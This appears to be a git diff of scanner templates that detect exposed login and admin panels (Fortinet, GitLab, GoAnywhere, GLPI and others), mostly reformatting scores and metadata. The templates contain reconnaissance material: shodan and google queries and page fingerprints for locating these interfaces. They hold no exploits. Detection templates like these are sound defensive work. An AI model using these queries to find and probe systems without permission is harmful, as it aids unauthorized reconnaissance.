a/http/exposed-panels/flightpath-panel.yaml +++ b/http/exposed-panels/flightpath-panel.yaml @@ -7,7 +7,7 @@ info: description: FlightPath login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/flink-exposure.yaml b/http/exposed-panels/flink-exposure.yaml index 414ba1b56f..7f9ab878eb 100644 --- a/http/exposed-panels/flink-exposure.yaml +++ b/http/exposed-panels/flink-exposure.yaml @@ -7,11 +7,11 @@ info: description: Apache Flink login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,apache,flink metadata: max-request: 1 + tags: panel,apache,flink http: - method: GET diff --git a/http/exposed-panels/flip-cms-panel.yaml b/http/exposed-panels/flip-cms-panel.yaml index 1dd586b691..3aa7a1125b 100644 --- a/http/exposed-panels/flip-cms-panel.yaml +++ b/http/exposed-panels/flip-cms-panel.yaml @@ -10,11 +10,11 @@ info: - https://www.fliplab.it/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 tags: panel,flip,cms http: @@ -24,6 +24,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/flowci-panel.yaml b/http/exposed-panels/flowci-panel.yaml index 3a0a105067..510d188140 100644 --- a/http/exposed-panels/flowci-panel.yaml +++ b/http/exposed-panels/flowci-panel.yaml @@ -10,11 +10,11 @@ info: - https://flowci.github.io/#/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,flowci metadata: max-request: 1 + tags: panel,flowci http: - method: GET diff --git a/http/exposed-panels/flureedb-admin-console.yaml b/http/exposed-panels/flureedb-admin-console.yaml index 77419323fc..c004eee602 100644 --- a/http/exposed-panels/flureedb-admin-console.yaml +++ b/http/exposed-panels/flureedb-admin-console.yaml @@ -9,11 +9,11 @@ info: - https://github.com/fluree/fluree-admin-ui classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"FlureeDB Admin Console" tags: panel,flureedb diff --git a/http/exposed-panels/footprints-panel.yaml b/http/exposed-panels/footprints-panel.yaml index bb1d16d377..5a117a6ba5 100644 --- a/http/exposed-panels/footprints-panel.yaml +++ b/http/exposed-panels/footprints-panel.yaml @@ -7,11 +7,11 @@ info: description: FootPrints Service Core login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"FootPrints Service Core Login" tags: tech,panel,footprints diff --git a/http/exposed-panels/forcepoint-applicance.yaml b/http/exposed-panels/forcepoint-applicance.yaml index 972317406e..2947cf385f 100644 --- a/http/exposed-panels/forcepoint-applicance.yaml +++ b/http/exposed-panels/forcepoint-applicance.yaml @@ -6,7 +6,7 @@ info: severity: info classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/forcepoint.yaml b/http/exposed-panels/forcepoint.yaml index bc572d537d..bd883f84b8 100644 --- a/http/exposed-panels/forcepoint.yaml +++ b/http/exposed-panels/forcepoint.yaml @@ -8,11 +8,11 @@ info: - https://www.forcepoint.com/product/email-security classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: forcepoint,panel,login metadata: max-request: 1 + tags: forcepoint,panel,login http: - method: GET @@ -21,7 +21,6 @@ http: matchers-condition: and matchers: - - type: word words: - "Forcepoint Email Security" diff --git a/http/exposed-panels/forti/fortiadc-panel.yaml b/http/exposed-panels/forti/fortiadc-panel.yaml index c1c90bfe72..af091f49de 100644 --- a/http/exposed-panels/forti/fortiadc-panel.yaml +++ b/http/exposed-panels/forti/fortiadc-panel.yaml @@ -9,11 +9,11 @@ info: - https://www.fortinet.com/products/application-delivery-controller/fortiadc classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"FortiADC" tags: panel,fortinet diff --git a/http/exposed-panels/fortinet/fortiap-panel.yaml b/http/exposed-panels/fortinet/fortiap-panel.yaml index 5df0b7e102..5a08bc2147 100644 --- a/http/exposed-panels/fortinet/fortiap-panel.yaml +++ b/http/exposed-panels/fortinet/fortiap-panel.yaml @@ -9,11 +9,11 @@ info: - https://www.fortinet.com/products/wireless-access-points classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"FortiAP" tags: panel,fortinet,fortiap diff --git a/http/exposed-panels/fortinet/fortimail-panel.yaml b/http/exposed-panels/fortinet/fortimail-panel.yaml index f61cfd7784..4c1eaba441 100644 --- a/http/exposed-panels/fortinet/fortimail-panel.yaml +++ b/http/exposed-panels/fortinet/fortimail-panel.yaml @@ -7,7 +7,7 @@ info: description: Fortinet FortiMail login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/fortinet/fortinet-fortiddos-panel.yaml b/http/exposed-panels/fortinet/fortinet-fortiddos-panel.yaml index 926de0a272..f70dbcee56 100644 --- a/http/exposed-panels/fortinet/fortinet-fortiddos-panel.yaml +++ b/http/exposed-panels/fortinet/fortinet-fortiddos-panel.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.fortinet.com/products/ddos/fortiddos metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"FortiDDoS" tags: panel,fortinet,fortiddos,login @@ -21,6 +21,7 @@ http: host-redirects: true max-redirects: 1 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/fortinet/fortinet-fortigate-panel.yaml b/http/exposed-panels/fortinet/fortinet-fortigate-panel.yaml index ae16da724a..cb09d9f280 100644 --- a/http/exposed-panels/fortinet/fortinet-fortigate-panel.yaml +++ b/http/exposed-panels/fortinet/fortinet-fortigate-panel.yaml @@ -7,11 +7,11 @@ info: description: Fortinet FortiGate SSL VPN login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,fortinet,fortigate metadata: max-request: 1 + tags: panel,fortinet,fortigate http: - method: GET diff --git a/http/exposed-panels/fortinet/fortinet-fortimanager-panel.yaml b/http/exposed-panels/fortinet/fortinet-fortimanager-panel.yaml index a227f68ac9..31d8575ccf 100644 --- a/http/exposed-panels/fortinet/fortinet-fortimanager-panel.yaml +++ b/http/exposed-panels/fortinet/fortinet-fortimanager-panel.yaml @@ -10,11 +10,11 @@ info: - https://www.fortinet.com/br/products/management/fortimanager classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,fortinet,fortios,fortimanager,detect metadata: max-request: 1 + tags: panel,fortinet,fortios,fortimanager,detect http: - method: GET diff --git a/http/exposed-panels/fortinet/fortinet-fortinac-panel.yaml b/http/exposed-panels/fortinet/fortinet-fortinac-panel.yaml index e0f6ab4808..7dc8b67658 100644 --- a/http/exposed-panels/fortinet/fortinet-fortinac-panel.yaml +++ b/http/exposed-panels/fortinet/fortinet-fortinac-panel.yaml @@ -7,11 +7,11 @@ info: description: Fortinet FortiNAC login panel was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Fortinac" tags: panel,fortinet,fortinac,login diff --git a/http/exposed-panels/fortinet/fortinet-panel.yaml b/http/exposed-panels/fortinet/fortinet-panel.yaml index a433e69869..e991651b6c 100644 --- a/http/exposed-panels/fortinet/fortinet-panel.yaml +++ b/http/exposed-panels/fortinet/fortinet-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.title:"FORTINET LOGIN" - verified: true tags: panel,fortinet,login,detect http: @@ -23,6 +23,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/fortinet/fortios-management-panel.yaml b/http/exposed-panels/fortinet/fortios-management-panel.yaml index 10614fd39f..2e40feef6e 100644 --- a/http/exposed-panels/fortinet/fortios-management-panel.yaml +++ b/http/exposed-panels/fortinet/fortios-management-panel.yaml @@ -7,11 +7,11 @@ info: description: Fortinet FortiOS Management interface panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:945408572 tags: panel,fortinet,fortios,fortigate,fortiproxy,fortiap @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/fortinet/fortios-panel.yaml b/http/exposed-panels/fortinet/fortios-panel.yaml index 8d4e983764..29a78ad878 100644 --- a/http/exposed-panels/fortinet/fortios-panel.yaml +++ b/http/exposed-panels/fortinet/fortios-panel.yaml @@ -10,11 +10,11 @@ info: - https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:945408572 tags: panel,fortinet,fortios diff --git a/http/exposed-panels/fortinet/fortitester-login-panel.yaml b/http/exposed-panels/fortinet/fortitester-login-panel.yaml index 8b04b86892..a7c36bd121 100644 --- a/http/exposed-panels/fortinet/fortitester-login-panel.yaml +++ b/http/exposed-panels/fortinet/fortitester-login-panel.yaml @@ -9,11 +9,11 @@ info: - https://www.fortinet.com/products/fortitester classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"FortiTester" tags: panel,fortinet @@ -24,6 +24,7 @@ http: - "{{BaseURL}}/index.html" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/fortinet/fortiweb-panel.yaml b/http/exposed-panels/fortinet/fortiweb-panel.yaml index 21ba70d8eb..70fcc4e7cd 100644 --- a/http/exposed-panels/fortinet/fortiweb-panel.yaml +++ b/http/exposed-panels/fortinet/fortiweb-panel.yaml @@ -7,11 +7,11 @@ info: description: Fortinet FortiWeb login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,fortinet,fortiweb,login metadata: max-request: 1 + tags: panel,fortinet,fortiweb,login http: - method: GET diff --git a/http/exposed-panels/freeipa-panel.yaml b/http/exposed-panels/freeipa-panel.yaml index b88d7628bd..26794935d3 100644 --- a/http/exposed-panels/freeipa-panel.yaml +++ b/http/exposed-panels/freeipa-panel.yaml @@ -7,11 +7,11 @@ info: description: FreeIPA Identity Management login panel was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: html:"FreeIPA" tags: panel,login,freeipa @@ -24,6 +24,7 @@ http: stop-at-first-match: true redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/freepbx-administration-panel.yaml b/http/exposed-panels/freepbx-administration-panel.yaml index 21f66a18eb..420d4d2db4 100644 --- a/http/exposed-panels/freepbx-administration-panel.yaml +++ b/http/exposed-panels/freepbx-administration-panel.yaml @@ -7,11 +7,11 @@ info: description: FreePBX admin panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"FreePBX Administration" tags: freepbx,panel diff --git a/http/exposed-panels/froxlor-management-panel.yaml b/http/exposed-panels/froxlor-management-panel.yaml index cd2c557dad..173dd4029f 100644 --- a/http/exposed-panels/froxlor-management-panel.yaml +++ b/http/exposed-panels/froxlor-management-panel.yaml @@ -7,11 +7,11 @@ info: description: Froxlor Server Management login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Froxlor Server Management Panel" tags: panel,froxlor @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: word words: - "<title>Froxlor Server Management Panel" diff --git a/http/exposed-panels/ftm-manager-panel.yaml b/http/exposed-panels/ftm-manager-panel.yaml index 6e291bd2d5..d43255c37e 100644 --- a/http/exposed-panels/ftm-manager-panel.yaml +++ b/http/exposed-panels/ftm-manager-panel.yaml @@ -7,11 +7,11 @@ info: description: Financial Transaction Manager login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"FTM manager" google-query: intitle:"FTM manager" tags: panel,ftm diff --git a/http/exposed-panels/fuelcms-panel.yaml b/http/exposed-panels/fuelcms-panel.yaml index 2958a2576c..3745cf4b64 100644 --- a/http/exposed-panels/fuelcms-panel.yaml +++ b/http/exposed-panels/fuelcms-panel.yaml @@ -7,11 +7,11 @@ info: description: Fuel CMS login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,fuelcms,oss metadata: max-request: 1 + tags: panel,fuelcms,oss http: - method: GET diff --git a/http/exposed-panels/fuji-xerox-printer-detect.yaml b/http/exposed-panels/fuji-xerox-printer-detect.yaml index de699f0074..4cf76f4a1a 100644 --- a/http/exposed-panels/fuji-xerox-printer-detect.yaml +++ b/http/exposed-panels/fuji-xerox-printer-detect.yaml @@ -7,11 +7,11 @@ info: description: Fuji Xerox printer panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"Fuji Xerox Co., Ltd" tags: iot,panel,fuji,printer diff --git a/http/exposed-panels/gargoyle-router.yaml b/http/exposed-panels/gargoyle-router.yaml index ee2401c436..a74c08773e 100644 --- a/http/exposed-panels/gargoyle-router.yaml +++ b/http/exposed-panels/gargoyle-router.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/8004 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Gargoyle Router Management Utility" tags: panel,iot,gargoyle,router,edb diff --git a/http/exposed-panels/genweb-plus-panel.yaml b/http/exposed-panels/genweb-plus-panel.yaml index 706aa5b491..9f222c27d5 100644 --- a/http/exposed-panels/genweb-plus-panel.yaml +++ b/http/exposed-panels/genweb-plus-panel.yaml @@ -7,11 +7,11 @@ info: description: GEMweb Plus 500 login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,gemweb metadata: max-request: 1 + tags: panel,gemweb http: - method: GET diff --git a/http/exposed-panels/geoserver-login-panel.yaml b/http/exposed-panels/geoserver-login-panel.yaml index 227122aeec..3f5cd6c84a 100644 --- a/http/exposed-panels/geoserver-login-panel.yaml +++ b/http/exposed-panels/geoserver-login-panel.yaml @@ -7,11 +7,11 @@ info: description: GeoServer login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"GeoServer" tags: panel,geoserver @@ -24,6 +24,7 @@ http: host-redirects: true max-redirects: 2 stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/gerapy-detect.yaml b/http/exposed-panels/gerapy-detect.yaml index 6876fcbf1b..adc4b6200e 100644 --- a/http/exposed-panels/gerapy-detect.yaml +++ b/http/exposed-panels/gerapy-detect.yaml @@ -7,11 +7,11 @@ info: description: Gerapy panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: tech,gerapy,panel metadata: max-request: 1 + tags: tech,gerapy,panel http: - method: GET diff --git a/http/exposed-panels/gespage-panel.yaml b/http/exposed-panels/gespage-panel.yaml index 72499b90e0..4ffc14931b 100644 --- a/http/exposed-panels/gespage-panel.yaml +++ b/http/exposed-panels/gespage-panel.yaml @@ -7,7 +7,7 @@ info: description: Gespage login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/gira-homeserver-homepage.yaml b/http/exposed-panels/gira-homeserver-homepage.yaml index 5472aee57a..accf8e6fa0 100644 --- a/http/exposed-panels/gira-homeserver-homepage.yaml +++ b/http/exposed-panels/gira-homeserver-homepage.yaml @@ -7,11 +7,11 @@ info: description: Gira HomeServer 4 login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Gira HomeServer 4" tags: panel,gira diff --git a/http/exposed-panels/git-repository-browser.yaml b/http/exposed-panels/git-repository-browser.yaml index 1d8a7a8528..cae0272031 100644 --- a/http/exposed-panels/git-repository-browser.yaml +++ b/http/exposed-panels/git-repository-browser.yaml @@ -7,11 +7,11 @@ info: description: Git Repository Browser panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Git repository browser" tags: panel,git @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/gitblit-panel.yaml b/http/exposed-panels/gitblit-panel.yaml index c324e5ab28..707be1ec36 100644 --- a/http/exposed-panels/gitblit-panel.yaml +++ b/http/exposed-panels/gitblit-panel.yaml @@ -7,11 +7,11 @@ info: description: Gitblit login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Gitblit" tags: panel,gitblit @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/gitea-login.yaml b/http/exposed-panels/gitea-login.yaml index 47db1a2fa6..2a6c18674a 100644 --- a/http/exposed-panels/gitea-login.yaml +++ b/http/exposed-panels/gitea-login.yaml @@ -7,7 +7,7 @@ info: description: Gitea login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -21,7 +21,6 @@ http: matchers-condition: and matchers: - - type: word words: - 'Powered by Gitea Version' diff --git a/http/exposed-panels/github-enterprise-detect.yaml b/http/exposed-panels/github-enterprise-detect.yaml index 17e84253be..137154261d 100644 --- a/http/exposed-panels/github-enterprise-detect.yaml +++ b/http/exposed-panels/github-enterprise-detect.yaml @@ -7,11 +7,11 @@ info: description: Github Enterprise login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Setup GitHub Enterprise" tags: panel,github diff --git a/http/exposed-panels/gitlab-detect.yaml b/http/exposed-panels/gitlab-detect.yaml index a9f42d67bd..f450e1ea64 100644 --- a/http/exposed-panels/gitlab-detect.yaml +++ b/http/exposed-panels/gitlab-detect.yaml @@ -7,7 +7,7 @@ info: description: Gitlab login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -21,6 +21,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/globalprotect-panel.yaml b/http/exposed-panels/globalprotect-panel.yaml index 13af360b62..a00769558d 100644 --- a/http/exposed-panels/globalprotect-panel.yaml +++ b/http/exposed-panels/globalprotect-panel.yaml @@ -7,11 +7,11 @@ info: description: Palo Alto Networks GlobalProtect login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,panos,globalprotect metadata: max-request: 2 + tags: panel,panos,globalprotect http: - method: GET diff --git a/http/exposed-panels/glowroot-panel.yaml b/http/exposed-panels/glowroot-panel.yaml index bf97dcc5eb..632489c842 100644 --- a/http/exposed-panels/glowroot-panel.yaml +++ b/http/exposed-panels/glowroot-panel.yaml @@ -7,8 +7,8 @@ info: reference: - https://www.facebook.com/photo?fbid=618105097026680&set=a.467014098802448 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Glowroot" tags: panel,login,glowroot @@ -28,4 +28,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/exposed-panels/glpi-panel.yaml b/http/exposed-panels/glpi-panel.yaml index d62db12f14..879e3a8998 100644 --- a/http/exposed-panels/glpi-panel.yaml +++ b/http/exposed-panels/glpi-panel.yaml @@ -10,11 +10,11 @@ info: - https://www.exploit-db.com/ghdb/7002 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 3 verified: true + max-request: 3 shodan-query: http.title:"GLPI" tags: glpi,edb,panel @@ -35,6 +35,7 @@ http: - "GLPI" - "glpi-project.org" condition: and + extractors: - type: regex name: version diff --git a/http/exposed-panels/gnu-mailman.yaml b/http/exposed-panels/gnu-mailman.yaml index 316df1c403..05341e0155 100644 --- a/http/exposed-panels/gnu-mailman.yaml +++ b/http/exposed-panels/gnu-mailman.yaml @@ -8,11 +8,11 @@ info: GNU Mailman panel was detected. Panel exposes all public mailing lists on server. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"Mailing Lists" tags: exposure,mailman,panel @@ -23,6 +23,7 @@ http: - "{{BaseURL}}/listinfo" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -35,4 +36,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/exposed-panels/go-anywhere-client.yaml b/http/exposed-panels/go-anywhere-client.yaml index 050eeac6b2..0f02cce224 100644 --- a/http/exposed-panels/go-anywhere-client.yaml +++ b/http/exposed-panels/go-anywhere-client.yaml @@ -7,11 +7,11 @@ info: description: GoAnywhere Web Client login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,goanywhere,login metadata: max-request: 1 + tags: panel,goanywhere,login http: - method: GET diff --git a/http/exposed-panels/goanywhere-mft-login.yaml b/http/exposed-panels/goanywhere-mft-login.yaml index e33e4f89bd..87c2f94452 100644 --- a/http/exposed-panels/goanywhere-mft-login.yaml +++ b/http/exposed-panels/goanywhere-mft-login.yaml @@ -7,11 +7,11 @@ info: description: GoAnywhere Managed File Transfer login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"GoAnywhere Managed File Transfer" tags: panel,goanywhere,login,filetransfer @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/gocd-login.yaml b/http/exposed-panels/gocd-login.yaml index 230c4b255b..e87f70ebfb 100644 --- a/http/exposed-panels/gocd-login.yaml +++ b/http/exposed-panels/gocd-login.yaml @@ -7,7 +7,7 @@ info: description: GoCD login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -25,6 +25,7 @@ http: words: - 'Login - Go' - 'gocd-params' + - type: status status: - 200 diff --git a/http/exposed-panels/gocron-panel.yaml b/http/exposed-panels/gocron-panel.yaml index 6720196a2f..b7e144caea 100644 --- a/http/exposed-panels/gocron-panel.yaml +++ b/http/exposed-panels/gocron-panel.yaml @@ -7,7 +7,7 @@ info: description: Gocron panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -21,6 +21,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: regex diff --git a/http/exposed-panels/gogs-panel.yaml b/http/exposed-panels/gogs-panel.yaml index 2959ae4b0c..86631cbf9f 100644 --- a/http/exposed-panels/gogs-panel.yaml +++ b/http/exposed-panels/gogs-panel.yaml @@ -9,11 +9,11 @@ info: - https://gogs.io/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Sign In - Gogs" google-query: intitle:"Sign In - Gogs" tags: panel,gogs diff --git a/http/exposed-panels/gophish-login.yaml b/http/exposed-panels/gophish-login.yaml index e2393e27fa..94de3156cc 100644 --- a/http/exposed-panels/gophish-login.yaml +++ b/http/exposed-panels/gophish-login.yaml @@ -7,7 +7,7 @@ info: description: Gophish login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -24,6 +24,7 @@ http: - type: word words: - 'Gophish - Login' + - type: status status: - 200 diff --git a/http/exposed-panels/gradle/gradle-cache-node-detect.yaml b/http/exposed-panels/gradle/gradle-cache-node-detect.yaml index 5783bc7900..f9ae9dd6b1 100644 --- a/http/exposed-panels/gradle/gradle-cache-node-detect.yaml +++ b/http/exposed-panels/gradle/gradle-cache-node-detect.yaml @@ -9,11 +9,11 @@ info: - https://gradle.com classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 